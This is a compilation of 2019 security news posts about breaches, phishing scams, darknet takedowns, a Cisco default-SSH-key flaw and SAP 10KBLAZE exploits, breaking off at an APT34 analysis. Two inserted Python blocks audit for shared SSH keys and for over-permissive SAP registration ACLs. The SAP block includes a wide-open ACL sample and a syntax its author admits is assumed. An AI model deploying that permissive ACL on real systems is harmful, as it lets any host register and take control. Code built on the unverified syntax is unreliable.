Hard to imagine, but appointment television hasn’t been a real thing for more than a decade now. First, we recorded. Now, we stream. After transforming (actually killing) the movie rental industry, Netflix started streaming in 2010. It changed how consumers viewed television by providing subscribers access to a sizable library of movies and shows on a wide variety of devices.

With a low price point, it wasn’t a very attractive target for hackers. It worked. By 2018, Netflix streaming accounted for 15% of all worldwide downstream traffic on the internet.

The rise of Netflix’s streaming service also led to a decline in piracy. BitTorrent, the preferred method of illicit (if not illegal) file downloading and sharing, decreased by a whopping 25 percent between 2011 and 2015. It was no longer the only quasi-infinite virtual warehouse of digital content. That approach to content had been monetized by Netflix; the paradigm of “everything, all the time” went mainstream.

For those who ask “How so?”: piracy has long been a hot-button topic among intellectuals, some of whom say it’s not about cost (free, in the case of piracy) but about ease of use. Consumers could see popular shows and movies on multiple platforms without the maelstrom of channels and hidden fees presented by cable plans, and without having to resort to piracy.

Netflix created a commercial play at the piracy game–all above board, and it worked.

The Wrong Idea

Intellectual viewpoints are not always welcome in boardrooms where decisions about distribution are made, and if in fact they wiggle their way in, they are not often embraced. Entertainment didn’t see the Netflix move as a mainstreaming of ease of use.

Enter the “walled garden” approach.

You see it everywhere. Instead of sharing its intellectual property with Netflix, Disney is launching its own streaming service, Disney+. NBC is pulling its tremendously popular workplace comedy, The Office, from Netflix and Hulu and making it available exclusively on NBCUniversal. AT&T is following suit with its recent acquisition of Time Warner and HBO. Apple, Google, and Facebook are all entering the ring as well. Most of these services are throwing massive amounts of money at original content and licensing to make their own platforms “must-have.”

What amounts to a cash grab for streaming services is a Byzantine snarl for consumers. Anyone who watched Avengers: Infinity War on Netflix in the last year will need to see its sequel, Endgame, on Disney+. Soon, certain podcasts will not be available on both Android and iOS. Support for streaming services on devices can be revoked, as was the case for Hulu on Samsung Smart TVs, or HBO GO on the Xbox 360. Movies “purchased” on Apple may vanish from a consumer’s account if the rights lapse. Streaming services are becoming Balkanized, and as the need for different accounts, payments, memberships, and in some cases hardware becomes ever more complex, once again a BitTorrent-style warehouse may become the more attractive alternative for tech-savvy users.

This fee-ridden decentralization of content has no doubt contributed mightily to the rebound of piracy, and in this new ecosystem hackers are the main beneficiaries.

Yo Ho Ho

To pirate a show or a movie, one need only download a small file from a website such as the Pirate Bay and open it with a BitTorrent client (most of them are free). A user then downloads pieces of said movie or show from however many people are sharing that file, while in turn uploading to other users. The more popular the video being downloaded, the faster it goes. Depending on your connection, a full high-quality movie can be downloaded in less time than it takes to make a bowl of popcorn.

Is it any wonder that many users decided to watch the Game of Thrones finale using BitTorrent?

From a cybersecurity perspective, BitTorrent is beyond problematic. It is in fact “accepting candy from a stranger in a windowless van” dangerous. Downloading a pirated torrent ultimately means getting files from a network of anonymous sources, and not just downloading them, but actually opening and running them. Malware has only gotten more sophisticated in recent years; if a payload can be delivered through a single link or file in a phishing scam, it doesn’t take much to imagine what can be digitally smuggled within a several gigabyte download of the latest Spider-Man movie. BitTorrent provides a relatively simple way to infect thousands of computers without needing to actively target anyone. It’s passive and potentially quite pervasive.

If this sounds speculative or far-fetched, it could be that you’re simply not reading enough news. For instance, a hacking campaign has been targeting South Korean BitTorrent users for the last few weeks by embedding backdoors into pirated television episodes. It’s only a matter of time before we see similar campaigns closer to home–and it’s a safe bet there already are such hacks happening in the U.S market now.

The threat to corporate and government networks shouldn’t be overlooked. When the U.S. Geological Survey’s networks were infected with Russian malware in late 2018, the culprit was traced back to malware embedded in pornographic videos downloaded by an employee that spread to a USB drive, a mobile device, and finally compromised that employee’s entire office network.

The Takeaway

Understood correctly, piracy is an object lesson in the unintended cybersecurity consequences of a business decision.

Movies, television shows and podcasts are expensive to produce, and companies are necessarily going to try to get the most bang for their buck by corralling the cash flow around their intellectual property. Multiple streaming accounts are expensive and often confusing to maintain, and consumers are similarly going to try to go the cheapest route, namely pirating shows rather than juggling plans and platforms, especially when doing so creates a one-stop shopping experience.

Hackers tend to seek the path of least resistance. An increasing number of potential targets trading relative security for convenience represents a lucrative and potentially dangerous avenue for attack. But it’s avoidable. Digital marketplaces are more profitable when they are free(er) and (more) open.

The post The Content Streaming Gold Rush is a Hacker’s El Dorado appeared first on Adam Levin.

Capital One Data Breach: How Impacted Users Can Stay More Secure

Capital One is one of the 10 largest banks based on U.S. deposits. As with many big-name brands, cybercriminals see these companies as an ideal target for large-scale attacks, which has now become a reality for the financial organization. According to CNN, approximately 100 million Capital One users in the U.S. and 6 million in Canada have been affected by a data breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more.

According to the New York Post, the alleged hacker claimed the data was obtained through a firewall misconfiguration. This misconfiguration allowed commands to be executed on a server that had access to data in Capital One’s storage space at Amazon. Luckily, Capital One stated that it “immediately fixed the configuration vulnerability.”

This breach serves as a reminder that users and companies alike should do everything in their power to keep personal information protected. If you think you might have been affected by this breach, follow these tips to help you stay secure:

  • Check to see if you’ve been notified by Capital One. The bank will notify everyone who was affected by the breach and offer them free credit monitoring and identity protection services. Be sure to take advantage of the services and check out the website Capital One set up for information on this breach.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible. Capital One will allow you to freeze your card so purchases can no longer be made.
  • Change your credentials. Err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts and alert you to any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Capital One Data Breach: How Impacted Users Can Stay More Secure appeared first on McAfee Blogs.

Briton who helped stop 2017 WannaCry virus spared jail over malware charges

  • Marcus Hutchins pleaded guilty to two malware charges
  • 25-year-old ‘incredibly thankful’ to be sentenced to time served

The British computer expert who helped shut down the WannaCry cyberattack on the NHS said he is “incredibly thankful” after being spared jail in the US for creating malware.

Marcus Hutchins was hailed as a hero in May 2017 when he found a “kill switch” that slowed the effects of the WannaCry virus affecting more than 300,000 computers in 150 countries.


Hacked forensic firm pays ransom after malware attack

Largest private provider Eurofins hands over undisclosed fee to regain control of systems

Britain’s largest private forensics provider has paid a ransom to hackers after its IT systems were brought to a standstill by a cyber-attack, it has been reported.

Eurofins, which is thought to carry out about half of all private forensic analysis, was targeted in a ransomware attack on 2 June, which the company described at the time as “highly sophisticated”. Three weeks later the company said its operations were “returning to normal”, but did not disclose whether or not a ransom had been paid.


#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms with the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. However, if the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam targets a user’s associated email login, hackers would have the capability of resetting and verifying ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

The university has confirmed an estimated 200,000 people have been affected by the hack, based on student numbers each year and staff turnover.


The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.


2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it focused on payment card data breaches and Verizon’s own breach investigations data. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by astute ‘plain English’ explanations, which is why the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motive behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches attributed to nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering attacks such as phishing/BEC
      • Crypto-mining malware accounts for less than 5% of data breaches; despite the publicity, it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point-of-sale breaches
      • The hacktivist threat remains low; the increase in hacktivist attacks reported in DBIR 2012 appears to have been a one-off spike

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studio’s $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

Using the Human Factor in Cyber Attacks

The human factor is fundamental to the success of a cyber attack, which is why it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being implemented within enterprises and institutions to keep their environments more secure. Along with this implementation comes a series of responsibilities to make sure the resources are used efficiently and effectively, generating the results expected by analysts, managers and management. In a corporate environment there are a number of tools we can find, such as a Web Application Firewall (WAF), an Intrusion Prevention System (IPS), antispam, antivirus, firewall, web filter / application control, DLP (Data Loss Prevention), switches, routers, etc. Each of these tools has its own characteristics and function within the corporate environment; when well configured, they generate results and metrics that help managers make decisions about environment/business growth, security improvement, and more.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities: attackers increasingly study CVEs (Common Vulnerabilities and Exposures) and use that knowledge to try to exploit, invade and exfiltrate data from companies or individuals. When implementing a security tool within a company, it is necessary to pay attention to some points that go beyond the implementation project, such as maintenance and updating of the tool according to the manufacturer’s good practices. A very common error today, one that makes many companies vulnerable to attack, is to care about the tool only during the implementation process; after that, the points mentioned above, which require constant attention throughout the tool’s life cycle inside the company, are forgotten, and the environment becomes susceptible to attacks and exploitation.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

Of the points mentioned above, I would like to draw attention to the ‘human factor’. With technological growth, creating a culture of security policy in the day-to-day work of employees has become fundamentally important. Companies are investing more and more in lectures, training and workshops to reduce the chance that an attack or intrusion is caused by the human factor. The human factor can be illustrated as follows: the attacker sends an email with a supposed advertisement or promotion containing a link that will direct the user to this “promotion”, but which is in fact a malicious link (this attack is called phishing); the user may be infected with some malware, and from that machine the attacker has internal access and begins to make lateral movements in an attempt to exploit or compromise the company environment. Every day we see research by tool makers showing that most of the attacks that occur still involve the human factor, that is, a user who is not prepared to identify some simple types of attack, such as phishing, which can compromise the entire security of the company.

The three most commonly used types of phishing attack are currently:

  • Mass-scale phishing: an attack where fraudsters launch an extensive network of attacks that are not highly targeted.
  • Spear phishing: tailor-made for a specific victim or group of victims using personal details.
  • Whaling: a specialized type of spear phishing that targets a “large” victim within a company, for example the CEO, CFO or another executive.

Below we have the anatomy of a phishing attack:

[Figure: anatomy of a phishing attack (human factor)]

About the author: Zoziel Freire

  • Cyber Security Analyst
  • Content Writer of the portal: www.infosectrain.com
  • Malicious document analyst
  • CompTIA Security Analytics Professional
  • LPIC-3 Enterprise Linux Professional
  • CompTIA Cybersecurity Analyst
  • LinkedIn: https://www.linkedin.com/in/zozielfreire/

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

Twitter: https://twitter.com/zoziel

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla

German police have shut down one of the world’s largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested its operators.

The German police, with the support of Europol, the Dutch police and the FBI, have shut down one of the world’s largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three suspects, all German nationals, were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also led to the arrest of two major suppliers of illegal narcotics in the United States.

The operation against the Wall Street Market started earlier this year, after Finnish authorities shut down another black marketplace, the Silkkitie market (aka the Valhalla marketplace), and many Finnish narcotics sellers moved to the Wall Street Market.

“The German Federal Criminal Police (Bundeskriminalamt) shut down the Wall Street Market, under the authority of the German Public Prosecutor’s office. They were supported by the Dutch National Police (Politie), Europol, Eurojust and various US government agencies (Drug Enforcement Administration, Federal Bureau of Investigation, Internal Revenue Service, Homeland Security Investigations, US Postal Inspection Service, and the US Department of Justice).” reads a press release published by the Europol.

“The Silkkitie (known as the Valhalla Marketplace) and its contents was also seized by Finnish Customs (Tulli) in close cooperation with the French National Police (La Police Nationale Française).”

The Wall Street Market marketplace was considered one of the most important points of aggregation in the cybercrime underground for trading in cocaine, heroin, cannabis and amphetamines as well as digital goods (i.e. stolen data, malware, and fake documents).

The Tor-based marketplace had more than one million registered accounts, more than 5,000 registered sellers and more than 60,000 sales offers.

“The illegal platform was exclusively accessible via the Tor network in the so-called Darknet and aimed at international trade in criminal goods.” continues Europol. “Most recently, more than 63 000 sales offers were placed on the online marketplace and more than 1 150 000 customer accounts and more than 5 400 sellers registered. For payment, the users of the online marketplace used the cryptocurrencies Bitcoin and Monero. The alleged marketplace officials are said to have received commission payments of 2 to 6 percent of the sales value for the settlement of illegal sales of the platform.”

The anonymity of the payments was ensured by using the Bitcoin and Monero cryptocurrencies. It was a prolific business for the Wall Street Market operators, who kept a fee of two to six percent of the sales value for themselves.

The German authorities seized over €550 000 in cash and millions worth of cryptocurrencies; the police also seized several vehicles and, of course, computers and data storage.

Behind this new success against cybercrime is a dedicated Dark Web Team, established by Europol, that works together with EU partners and law enforcement across the globe.

The team delivers a complete, coordinated approach for:

  • sharing information;
  • providing operational support and expertise in different crime areas;
  • developing tools, tactics and techniques to conduct dark web investigations;
  • identifying threats and targets. 

“A shared commitment across the law enforcement community worldwide and a coordinated approach by law enforcement agencies has once again proved their effectiveness.” concludes Europol. “The scale of the operation at Europol demonstrates the global commitment to tackling the use of the dark web as a means to commit crime.”

Pierluigi Paganini

(SecurityAffairs – Wall Street Market, hacking)

The post Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla appeared first on Security Affairs.

Cisco addresses a critical flaw in Nexus 9000 switches

Cisco released security patches to address dozens of vulnerabilities in its products, including a critical vulnerability affecting Nexus 9000 switches.

Cisco released security patches to address dozens of vulnerabilities in its products. Among the flaws fixed by Cisco there is also a critical vulnerability in Nexus 9000 switches that is tracked as CVE-2019-1804 and that received a CVSS score of 9.8.

Cisco Nexus 9000

The vulnerability resides in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure Mode Switch Software and it is related to the presence of a default SSH key pair in all devices.

An attacker could exploit the default SSH key pair by opening an SSH connection via IPv6 to a targeted device; in this way the attacker is able to connect to the system with the privileges of the root user.

“A vulnerability in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an unauthenticated, remote attacker to connect to the affected system with the privileges of the root user.” reads the security advisory published by Cisco.

“The vulnerability is due to the presence of a default SSH key pair that is present in all devices. An attacker could exploit this vulnerability by opening an SSH connection via IPv6 to a targeted device using the extracted key materials. An exploit could allow the attacker to access the system with the privileges of the root user.”

The flaw is not exploitable over IPv4.

The flaw affects Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode running Cisco NX-OS software release prior to 14.1(1i).

Users have to install the software update released by Cisco to address the flaw; no workarounds are available.

The good news is that Cisco is not aware of any exploitation of the vulnerability in the wild.
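The defect Cisco describes is a key pair that is identical on every device. The general problem a defender can check for across a fleet is "the same public key appears on more than one host". The following is an added example, not Cisco's tooling or anything from the advisory: it parses ssh-keyscan-style lines (host keys), computes OpenSSH-style SHA256 fingerprints and reports keys shared by several hosts. The same grouping applies unchanged to authorized_keys entries collected from each device. Hostnames and key blobs are constructed placeholders, not real device output.

```python
import base64
import hashlib
from collections import defaultdict


def fingerprint(b64_key: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    raw = base64.b64decode(b64_key)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_keyscan(text: str) -> list:
    """Parse `ssh-keyscan`-style lines: '<host> <keytype> <base64> [comment]'."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        entries.append((parts[0], parts[1], parts[2]))
    return entries


def shared_keys(text: str) -> dict:
    """Map (keytype, fingerprint) -> sorted hosts, for every key seen on more than one host."""
    hosts_by_key = defaultdict(set)
    for host, ktype, key in parse_keyscan(text):
        hosts_by_key[(ktype, fingerprint(key))].add(host)
    return {k: sorted(v) for k, v in hosts_by_key.items() if len(v) > 1}


def fake_blob(seed: bytes) -> str:
    # Constructed stand-in for a key blob: not a valid RSA key, the bytes only
    # need to be distinct per seed so that fingerprints differ.
    return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + hashlib.sha256(seed).digest()).decode("ascii")


# Constructed sample: what `ssh-keyscan -t rsa` might return for three switches
# when two of them carry the same key. Hostnames are placeholders.
SAMPLE_SCAN = "\n".join([
    "# constructed sample, not real device output",
    "leaf-101 ssh-rsa " + fake_blob(b"shared-default"),
    "leaf-102 ssh-rsa " + fake_blob(b"shared-default"),
    "spine-201 ssh-rsa " + fake_blob(b"unique-spine"),
])


def report(text: str = SAMPLE_SCAN) -> list:
    """One human-readable line per shared key."""
    return [f"{ktype} {fp} shared by {', '.join(hosts)}"
            for (ktype, fp), hosts in shared_keys(text).items()]


if __name__ == "__main__":
    for line in report():
        print(line)
```

Feed it the concatenated output of ssh-keyscan run against every management address; any fingerprint listed for more than one host is either a cloned image, a default key or a deliberate share, and each of those deserves a ticket.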

Cisco also addressed over 20 High severity vulnerabilities affecting the Web Security Appliance (WSA), Umbrella Dashboard, Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software, RV320 and RV325 routers, IP Phone 7800 and 8800 Series, Application Policy Infrastructure Controller (APIC) software, and the Nexus 9000 switches.

The list of flaws includes privilege escalation issues, denial of service vulnerabilities and session hijacking bugs.

Pierluigi Paganini

(SecurityAffairs – Cisco Nexus 9000, hacking)

The post Cisco addresses a critical flaw in Nexus 9000 switches appeared first on Security Affairs.

10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers

The availability of 10KBLAZE PoC exploits for an old SAP configuration issue poses a severe risk of attacks against business applications.

The risk of cyber attacks against SAP systems has increased after security researchers released PoC exploits for old SAP configuration flaws.

SAP Message Server and SAP Gateway implement an access control list (ACL) mechanism to determine which IP addresses are allowed to register application servers. A wrong ACL configuration could allow any host with network access to the Message Server to register an application server.

In this scenario, an attacker with access to the network hosting the vulnerable systems can take full control of them.

Experts pointed out that the problem could impact many SAP products, including S/4HANA and NetWeaver Application Server (AS). The good news is that the most recent versions of SAP software are configured by default to drop unauthorized connections.

Since 2005, SAP has been providing instructions on how to configure an ACL for the Message Server. In 2005 the company released security note 821875, and in 2009 it released security note 1408081 containing instructions on how to properly configure the access list for the Gateway. In 2010 SAP released another note, 1421005, that provides instructions on the correct configuration of the Message Server ACL.
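The misconfiguration at issue is an access list that lets any host register. As an added example (not SAP's, Onapsis's or the researchers' code), here is a small checker for the Gateway registration ACL that flags permit rules with a wildcard host and confirms the list ends with a deny-all. The line syntax assumed is SAP's version-2 reginfo format as I understand it from SAP's documentation (a '#VERSION=2' header, then one rule per line: 'P' permit or 'D' deny followed by KEY=VALUE fields, comma-separated lists, '*' as wildcard); the page does not reproduce the format, and both file contents below are constructed.

```python
# Constructed reginfo contents in the assumed version-2 syntax (see lead-in).
# The first one is the classic "anyone may register anything" list; the second
# permits one program from two named hosts and denies everything else.
PERMISSIVE_REGINFO = """#VERSION=2
P TP=* HOST=* ACCESS=* CANCEL=*
"""

HARDENED_REGINFO = """#VERSION=2
P TP=ZRFC_SERVER HOST=app01.corp.example,app02.corp.example ACCESS=internal,local CANCEL=internal,local
D TP=* HOST=*
"""


def parse_reginfo(text: str) -> list:
    """Return one dict per rule: {'line': n, 'action': 'P'|'D', 'TP': ..., 'HOST': ..., ...}."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        rule = {"line": lineno, "action": parts[0].upper()}
        for token in parts[1:]:
            key, sep, value = token.partition("=")
            if sep:
                rule[key.upper()] = value
        rules.append(rule)
    return rules


def has_wildcard(value: str) -> bool:
    """True if any element of a comma-separated list is the '*' wildcard."""
    return any(item.strip() == "*" for item in value.split(","))


def find_wildcard_permits(text: str) -> list:
    """One finding per permit rule whose HOST (or ACCESS) is unrestricted."""
    findings = []
    for rule in parse_reginfo(text):
        if rule["action"] != "P":
            continue
        host = rule.get("HOST", "*")      # a missing HOST is treated as unrestricted (assumption)
        access = rule.get("ACCESS", "*")
        if has_wildcard(host):
            findings.append(f"line {rule['line']}: any host may register TP={rule.get('TP', '*')}")
        elif has_wildcard(access):
            findings.append(f"line {rule['line']}: registered program reachable from any host")
    return findings


def ends_with_deny_all(text: str) -> bool:
    """A safe list closes with an explicit 'D TP=* HOST=*' so nothing falls through."""
    rules = parse_reginfo(text)
    if not rules:
        return False
    last = rules[-1]
    return (last["action"] == "D"
            and has_wildcard(last.get("TP", "*"))
            and has_wildcard(last.get("HOST", "*")))


if __name__ == "__main__":
    for name, text in (("permissive", PERMISSIVE_REGINFO), ("hardened", HARDENED_REGINFO)):
        print(name, find_wildcard_permits(text), "deny-all:", ends_with_deny_all(text))
```

Run it against the reginfo file exported from each instance as part of a configuration audit; the Message Server ACL deserves the same treatment, with a separate parser for its own syntax.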

Despite the numerous notes, many organizations still fail to properly configure their SAP solutions. According to a report published in April 2018 by security firm Onapsis, 90 percent of SAP systems were affected by a 13-year-old configuration vulnerability in SAP NetWeaver that can be exploited by a remote, unauthenticated attacker with network access to the system.

In April, the researchers Dmitry Chastuhin and Mathieu Geli presented security issues related to SAP configuration and architecture at the OPCDE cybersecurity conference in Dubai.

The security duo also released exploits designed to target improperly configured systems.

sap 10KBLAZE exploits

Experts at Onapsis dubbed the exploits 10KBLAZE; they estimate that the availability of the exploit code could significantly increase the number of attacks against SAP installs. Onapsis estimates that 10KBLAZE exploits could affect 9 out of 10 SAP systems of more than 50,000 customers worldwide.

“In April 2019, several new exploits targeting SAP business applications were released in a public forum. Although the exploits target insecure configurations that have been reported by SAP SE and Onapsis in the past, their public release significantly increases the risk of successful cyber attacks against SAP implementations globally.” reads the analysis published by Onapsis. “we estimate these exploits could affect 9 out of 10 SAP systems of more than 50,000 customers world-wide.”

The name 10KBLAZE comes from the fact that organizations hit by attacks would need to disclose their impact to the U.S. Securities and Exchange Commission (SEC) in their annual 10-K filing.

“Based on publicly available data provided by SAP, Onapsis estimates that approximately 50,000 companies and a collective 1,000,000 systems are currently using SAP NetWeaver and S/4HANA.” reads the report published by the experts. “Onapsis research gathered over ten years calculates that nearly 90% of these systems, approximately 900,000, may suffer from the misconfigurations for which these exploits are now publicly available,”

Researchers also found many SAP systems exposed on the internet that could be hit by remote, unauthenticated attackers.

Organizations have to check their configurations to prevent such attacks.

Pierluigi Paganini

(SecurityAffairs – 10KBLAZE, Genesis Store)

The post 10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers appeared first on Security Affairs.

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn with wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016, Anton Bogdanov and his co-conspirators compromised the computer systems of private tax preparation firms in the United States and stole the personally identifiable information (PII) of the victims, including Social Security numbers and dates of birth.

The crooks used the stolen data to impersonate the victims and modified the tax returns so that the refunds were paid to prepaid debit cards under their control.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”

Anton Bogdanov

According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybercrime)

The post Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme appeared first on Security Affairs.

APT34: Glimpse project

The APT34 Glimpse project is perhaps the most complete APT34 project known so far; the popular researcher Marco Ramilli analyzed it for us.

Indeed we can observe a file-based command and control structure (a quite unusual solution), a VBS launcher, a PowerShell payload and a covert channel over a DNS engine. This last feature is the best-known characteristic attributed to APT34. But let's move on and start a quick analysis of it.

Context:

